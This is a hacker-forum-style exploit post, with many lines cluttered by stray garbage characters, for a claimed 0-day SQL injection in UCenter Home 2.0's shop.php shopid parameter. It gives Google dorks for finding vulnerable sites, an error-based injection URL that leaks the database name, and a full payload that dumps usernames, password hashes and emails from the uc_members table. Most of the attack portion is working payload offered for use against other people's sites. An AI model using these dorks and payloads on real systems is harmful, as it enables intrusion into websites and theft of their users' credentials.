& R& h# e$ F: v__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ t4 `* W: A a
( ?7 v! L* g6 o; c 2 T5 `/ _$ C" e8 V3 l* r' f
# a) Y& H ~- o2 D4 a; S*/ Author : KnocKout
" v+ B5 r X/ z+ r# T2 D8 c3 {. H
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 8 I2 u. ?6 b" G
7 b, z1 u' B7 o
*/ Contact: knockoutr@msn.com # k& v% M8 N; t8 T& F0 {
# O$ ?1 L; e) B# R2 [
*/ Cyber-Warrior.org/CWKnocKout
! v6 N: S; N% T+ l* T/ R1 `4 R
7 j' B% C) z0 u4 o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ ?2 M5 w6 Q! y$ K3 a
/ X/ h2 C. u+ X2 f, C6 VScript : UCenter Home
' J8 a! C- F7 c! k: `) k, O5 M4 P
, g2 v4 p' t2 X& iVersion : 2.0 4 q; I5 H, @; m4 v" }
' t% } N( e1 o! R/ [, o
Script HomePage : http://u.discuz.net/
" m6 Q+ _0 I' A4 Q. t) E# H' \: {% P. f. b- v% R9 R* d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ D* r6 j3 t6 L1 \
; x* C7 `' ^4 y; k1 ?Dork : Powered by UCenter inurl:shop.php?ac=view
4 ~: \' g* d- J# U
; S; T$ \2 }+ a4 w1 `Dork 2 : inurl:shop.php?ac=view&shopid= ! {( p1 o/ Y* y: C4 @' F) m
2 f+ e: q+ }8 J; W* c8 w9 x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # E% e( E+ o3 a" {
- y) n9 Y% I b' g# K
Vuln file : Shop.php 4 B. z4 `6 b/ ]9 o
8 F( Z: P& U1 ?2 B8 O5 o% ~% i' avalue's : (?)ac=view&shopid=
% c: }* l& l0 D5 c! o0 g) C% D
) Q4 o" _9 I1 I. iVulnerable Style : SQL Injection (MySQL Error Based)
; s% d0 m5 Q, i
5 X! o8 U. y6 e+ ZNeed Metarials : Hex Conversion
# i; T3 g5 H8 A2 F7 P" V
' E0 X l! b A. p3 O' ^+ i__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 h# J4 m6 i# k' F4 `! e/ n3 l( w8 `# j+ Z* }8 K
Your Need victim Database name.
- Q; i8 k3 M- h% m# ^ b" P
& V% L3 @$ Z3 J9 F- Ifor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
- u& R! l' V$ Q3 P3 O4 ] Y4 G$ @+ f3 s
..
: U/ ^8 h9 K3 t I$ h% R5 {/ y: {0 i+ ]% P
DB : Okey.
; m; l7 U2 `3 a) O; p
' @, Y; V* i* [* w: W! k1 {9 Hyour edit DB `[TARGET DB NAME]` ( [" P a; l; x8 G, x9 v9 j
B; U8 r7 K1 y7 Q2 O0 [Example : 'hiwir1_ucenter'
, s( c- F6 x- Q1 {3 U! S4 n/ p- f4 ~ `. H( M6 ] O- X
Edit : Okey. ( }( T8 d7 Q6 x- s( C: |7 ]
8 A5 K! z/ x/ G: t2 e; JYour use Hex conversion. And edit Your SQL Injection Exploit..
4 b0 v' A6 z- Q) s, \
6 ~! [( U; O1 x$ B- ?3 l: O
2 R' h$ Z3 C* S8 M1 h/ y7 ]4 ~1 L. I$ [3 G" A8 _6 i! K. T/ k
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 4 ^& o* m8 B; `, B8 o. v6 P9 t$ J
|